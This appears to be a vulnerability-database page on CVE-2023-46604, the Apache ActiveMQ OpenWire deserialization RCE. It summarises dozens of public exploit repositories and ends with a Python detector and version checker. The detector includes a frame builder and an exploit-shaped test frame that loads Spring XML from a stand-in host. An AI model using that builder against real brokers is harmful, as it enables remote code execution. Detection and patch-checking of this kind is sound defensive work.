Java OpenWire - Deserialization RCE
Title source: llm
Exploitation Summary
CVE-2023-46604 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added November 2, 2023, with confirmed use in ransomware campaigns.
EIP tracks 43 public exploits from researchers including SaumyajeetDas, ImuSpirit and Arlenhiack, as well as a Metasploit module, exploits/multi/misc/apache_activemq_rce_cve_2023_46604.
A Nuclei detection template is also available.
AI-analyzed exploit summary
This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ via deserialization to achieve remote code execution (RCE). The exploit sends a crafted payload to trigger the vulnerability and can be used to generate reverse shells for both Linux and Windows targets.
Description
The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.
Exploits (43)
This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ via deserialization to achieve remote code execution (RCE). The exploit sends a crafted payload to trigger the vulnerability and can be used to generate reverse shells for both Linux and Windows targets.
This repository contains a functional GUI-based exploit for CVE-2023-46604, targeting Apache ActiveMQ. The exploit leverages deserialization via a crafted `ClassPathXmlApplicationContext` payload to achieve remote code execution (RCE).
This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ versions below 5.18.3. The exploit leverages a deserialization vulnerability to achieve remote code execution (RCE) by crafting a malicious XML payload that defines a malicious class and executes arbitrary commands.
This repository contains a functional Python exploit for CVE-2023-46604, a deserialization vulnerability in Apache ActiveMQ's OpenWire protocol. The exploit crafts a malicious payload to trigger remote code execution by leveraging unsafe deserialization practices.
This repository contains a functional exploit for CVE-2023-46604, leveraging a deserialization vulnerability in Apache ActiveMQ. The exploit sends a malicious ExceptionResponse packet containing a crafted ClassPathXmlApplicationContext object, which triggers remote code execution via a Spring bean XML file hosted on an attacker-controlled server.
This repository contains a functional Python exploit for CVE-2023-46604, a deserialization vulnerability in Apache ActiveMQ's OpenWire protocol. The exploit generates a pseudo-shell by crafting malicious XML payloads and leveraging a local HTTP server to receive command output from the target.
This repository contains a functional Python exploit for CVE-2023-46604, an RCE vulnerability in Apache ActiveMQ. The exploit crafts a malicious OpenWire protocol packet to trigger deserialization of a remote XML file, leading to arbitrary code execution.
This repository contains a functional Go-based exploit for CVE-2023-46604, targeting Apache ActiveMQ. The exploit validates the target, checks the version, and executes a reverse shell or downloads/executes a binary payload via a Nashorn payload.
This repository contains a fully functional exploit for CVE-2023-46604, leveraging deserialization of a malicious XML configuration file in Apache ActiveMQ to achieve remote code execution. The exploit includes a Dockerized vulnerable environment, a Python-based exploit script, and a malicious XML payload to demonstrate the vulnerability.
This repository contains a working proof-of-concept for CVE-2021-44228 (Log4Shell) and CVE-2023-46604 (Apache ActiveMQ RCE). It includes detailed setup instructions, exploit code, and steps to achieve remote code execution via LDAP/JNDI injection and reverse shell.
This repository contains a functional exploit for CVE-2023-46604, a critical remote code execution vulnerability in Apache ActiveMQ. The exploit leverages insecure deserialization in the OpenWire protocol to execute arbitrary commands by manipulating serialized class types.
This repository contains a functional Python exploit for CVE-2023-46604, a deserialization vulnerability in Apache ActiveMQ's OpenWire transport unmarshaller. The exploit sends a crafted payload to trigger remote code execution by leveraging a malicious XML URL.
This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ 5.15.15. The exploit leverages the OpenWire deserialization vulnerability to achieve remote code execution (RCE); the repository also ships broker and client truststore files for its test setup.
This repository contains a Java-based tool for detecting and exploiting multiple Apache ActiveMQ vulnerabilities, including CVE-2023-46604. It includes functional exploit code for deserialization attacks and webshell deployment, with a GUI interface for ease of use.
This repository provides a detailed academic analysis of CVE-2023-46604, focusing on vulnerability explanation, technical details, impact assessment, and mitigation strategies for Apache ActiveMQ deserialization RCE. It includes modular documentation but no functional exploit code.
This repository contains a functional Python exploit for CVE-2023-46604, which targets an unsafe deserialization vulnerability in Apache ActiveMQ's OpenWire protocol. The script crafts a malicious payload to trigger remote code execution by loading a Spring bean from a specified XML URL.
This repository contains a functional Python exploit for CVE-2023-46604, targeting Apache ActiveMQ's OpenWire protocol. The exploit crafts a malicious packet to trigger deserialization of a Spring XML configuration file, leading to remote code execution.
The repository contains a functional PoC for CVE-2023-44487 (HTTP/2 Rapid Reset DoS) with a Python script that exploits the vulnerability by rapidly resetting HTTP/2 streams. It also references a Metasploit module for CVE-2023-46604 (Apache ActiveMQ RCE) but does not include the actual exploit code for the latter.
This repository contains a functional Python exploit for CVE-2023-46604, targeting Apache ActiveMQ. The exploit crafts a malicious payload to trigger deserialization via Spring gadgets (FileSystemXmlApplicationContext or ClassPathXmlApplicationContext) to achieve remote code execution.
This repository contains a functional Python exploit for CVE-2023-46604, an unauthenticated RCE vulnerability in Apache ActiveMQ. The exploit crafts a malicious packet to trigger deserialization of a Spring XML configuration file, leading to remote code execution via a reverse shell.
This repository provides a functional lab setup for exploiting CVE-2023-46604, an RCE vulnerability in Apache ActiveMQ 5.18.2. It includes PowerShell scripts to automate the creation and deletion of Kali Linux (attacker) and Debian 11 (victim) VMs, along with installation scripts for the vulnerable software.
This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ's OpenWire protocol deserialization vulnerability. The exploit sends a crafted payload to trigger remote code execution by manipulating serialized class types.
This repository documents a lab environment for testing IDS/IPS mechanisms against CVE-2023-46604, an RCE vulnerability in Apache ActiveMQ. It includes details on vulnerability scanning, exploitation via Metasploit, and mitigation using Snort, iptables, and UFW.
This repository documents a threat hunting workshop focused on CVE-2023-46604, detailing the investigation of Apache ActiveMQ exploitation, post-exploitation behaviors, and detection methodologies using Elastic SIEM. It provides a technical walkthrough of the workflow, including service persistence analysis and MITRE ATT&CK mapping.
This repository is a Docker-based playground for CVE-2023-46604 (Apache ActiveMQ RCE) but lacks actual exploit implementation. The `attack.sh` and `verify.sh` scripts contain only placeholders (TODOs) with no functional exploit code.
This repository provides a detailed technical analysis of CVE-2023-46604, an insecure deserialization vulnerability in Apache ActiveMQ. It includes root cause analysis, patch diffs, and a walkthrough of the exploit chain involving OpenWire deserialization and arbitrary class instantiation.
This repository provides a detailed lab setup and detection methodology for CVE-2023-46604, focusing on understanding the Apache ActiveMQ RCE vulnerability via the OpenWire protocol. It includes network topology, detection steps using Wireshark, and Suricata IDS rules for detecting exploitation attempts.
This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ. The exploit sends a crafted payload to trigger a deserialization vulnerability, resulting in remote code execution (RCE). The repository includes a Docker setup for both victim and attacker environments, along with a Python script to deliver the exploit.
This repository provides a detailed technical analysis of CVE-2023-46604, focusing on the OpenWire protocol in Apache ActiveMQ. It includes packet structure breakdowns, protocol analysis, and explanations of how the vulnerability leads to remote code execution (RCE).
This repository contains a functional exploit for CVE-2023-46604, leveraging reflection to instantiate a malicious Spring class that loads a remote XML file containing a ProcessBuilder payload for RCE. The exploit includes both client and server-side components, with a Java-based HTTP server to serve the malicious XML and Python scripts to facilitate the attack.
This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ via a deserialization vulnerability. The exploit sends a crafted payload to trigger remote code execution (RCE) on the victim machine, demonstrated through a reverse shell setup.
This repository contains a functional honeypot designed to simulate a vulnerable Apache ActiveMQ service (CVE-2023-46604) to capture attacker IPs, XML payloads, and RCE commands. It includes a Rust-based server that logs attack details and provides an API for retrieving collected indicators.
This repository contains a functional exploit PoC for CVE-2023-46604, leveraging deserialization in Apache ActiveMQ via crafted ExceptionResponse messages. The exploit sends a malicious payload to trigger remote code execution on vulnerable ActiveMQ instances.
This repository contains a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ 5.15.5. The exploit crafts a malicious packet to trigger deserialization of a malicious class, leading to remote code execution (RCE) by loading an external XML configuration file.
This is a functional exploit PoC for CVE-2023-46604, targeting Apache ActiveMQ via a crafted serialized payload. The script constructs a malicious packet with a ClassPathXmlApplicationContext class name and an attacker-controlled XML payload, which can lead to remote code execution.
The repository contains only a README file with minimal content, mentioning an unrelated CVE (CVE-2019-9053) and no actual exploit code or technical details. It appears to be a placeholder with no functional exploit or analysis.
The repository contains only a minimal README with no exploit code or technical details. It is a placeholder with no functional content.
This repository contains a functional GUI-based exploit for CVE-2023-46604, targeting Apache ActiveMQ versions <= 5.18.2. The exploit leverages deserialization via a crafted `ExceptionResponse` containing a malicious `ClassPathXmlApplicationContext` to achieve remote code execution.
This repository provides a functional exploit for CVE-2023-46604, targeting Apache ActiveMQ 5.18.2 via a crafted XML payload sent over the OpenWire protocol. It includes detailed setup instructions, exploit code (exploit.py), and a malicious XML payload (poc.xml) to achieve remote code execution (RCE) and establish a reverse shell.
This Metasploit module exploits a deserialization vulnerability in Apache ActiveMQ's OpenWire transport unmarshaller, allowing unauthenticated remote code execution via crafted payloads delivered through a malicious XML configuration file.
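As an added example (not code from any of the repositories listed above, nor from the Metasploit module), here is a small Python parser for the loosely encoded OpenWire frame that the ExceptionResponse entries above describe, together with the version check implied by the fixed releases in the description. It reads the frame the way the pre-fix unmarshaller does (command type byte, command id, response-required flag, correlation id, then the throwable's class name and message that are handed to createThrowable), flags frames whose "throwable" class is one of the Spring application-context gadgets named on this page, and compares a broker ProviderVersion string against the fixed releases. The two sample frames, the 203.0.113.10 address and the poc.xml path are constructed test vectors; the treatment of branches newer than 5.18 as fixed and of branches older than 5.15 as unfixed is my assumption, not a statement from the advisory.

```python
import re
import struct

# OpenWire command type byte for ExceptionResponse (CommandTypes.EXCEPTION_RESPONSE).
EXCEPTION_RESPONSE = 31

# The two Spring gadget classes named in the exploit summaries on this page. The pre-fix
# BaseDataStreamMarshaller.createThrowable() reflectively instantiates whatever class name
# appears here with a single String argument, so a non-Throwable class is the tell.
SPRING_CONTEXT_GADGETS = {
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "org.springframework.context.support.FileSystemXmlApplicationContext",
}

# Earliest fixed release per maintained branch, taken from the advisory text above.
FIXED_VERSIONS = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}


def _loose_string(buf, off):
    """Read a 'loose' OpenWire string: 1 null-flag byte, then a Java readUTF (2-byte length + bytes)."""
    if buf[off] == 0:
        return None, off + 1
    (n,) = struct.unpack_from(">H", buf, off + 1)
    start = off + 3
    return buf[start:start + n].decode("utf-8"), start + n


def parse_openwire_frame(frame):
    """Parse a size-prefixed, loosely encoded OpenWire frame.

    Returns a dict with the command type and, for an ExceptionResponse, the class name and
    message that the unmarshaller would pass to createThrowable(className, message).
    """
    (size,) = struct.unpack_from(">I", frame, 0)
    body = frame[4:4 + size]
    if len(body) != size:
        raise ValueError("truncated frame")
    info = {"type": body[0]}
    if info["type"] != EXCEPTION_RESPONSE:
        return info
    off = 1
    (info["command_id"],) = struct.unpack_from(">I", body, off)
    off += 4
    info["response_required"] = bool(body[off])
    off += 1
    (info["correlation_id"],) = struct.unpack_from(">I", body, off)
    off += 4
    if body[off] == 0:  # throwable marshalled as null
        return info
    off += 1
    info["class_name"], off = _loose_string(body, off)
    info["message"], off = _loose_string(body, off)
    return info


def is_cve_2023_46604_attempt(frame):
    """True when an ExceptionResponse carries a Spring XML context gadget as its 'exception' class."""
    return parse_openwire_frame(frame).get("class_name") in SPRING_CONTEXT_GADGETS


def is_fixed_version(version):
    """True if an ActiveMQ ProviderVersion string is at or above its branch's fixed release."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unrecognised version string: %r" % version)
    parts = tuple(int(x) for x in m.groups())
    fixed = FIXED_VERSIONS.get(parts[:2])
    if fixed is None:
        # Assumption: anything newer than 5.18 carries the fix, anything older than 5.15 does not.
        return parts >= (5, 18, 3)
    return parts >= fixed


def build_exception_response(class_name, message):
    """Encode an ExceptionResponse frame in loose format; used here only to build test vectors."""
    body = bytes([EXCEPTION_RESPONSE]) + struct.pack(">I", 0) + b"\x00" + struct.pack(">I", 0)
    body += b"\x01"  # throwable is not null
    for s in (class_name, message):
        raw = s.encode("utf-8")
        body += b"\x01" + struct.pack(">H", len(raw)) + raw
    return struct.pack(">I", len(body)) + body


# Constructed samples: a legitimate broker error and a frame shaped like the public PoCs.
BENIGN_FRAME = build_exception_response("java.lang.SecurityException", "User is not authorized")
ATTACK_FRAME = build_exception_response(
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "http://203.0.113.10/poc.xml",
)

if __name__ == "__main__":
    for name, frame in (("benign", BENIGN_FRAME), ("attack", ATTACK_FRAME)):
        print(name, parse_openwire_frame(frame)["class_name"], is_cve_2023_46604_attempt(frame))
    for v in ("5.15.15", "5.18.2", "5.18.3"):
        print(v, "fixed" if is_fixed_version(v) else "vulnerable")
```

The parser only handles the loose encoding, which is what a fresh connection uses before WireFormatInfo negotiation turns on tight encoding; a honeypot or IDS rule that keys on the class-name string will see the same bytes in either case, since loose and tight strings are both length-prefixed UTF-8.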
Nuclei Templates (1)
product:"ActiveMQ OpenWire Transport" || cpe:"cpe:2.3:a:apache:activemq" || product:"activemq openwire transport"
References (8)
Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H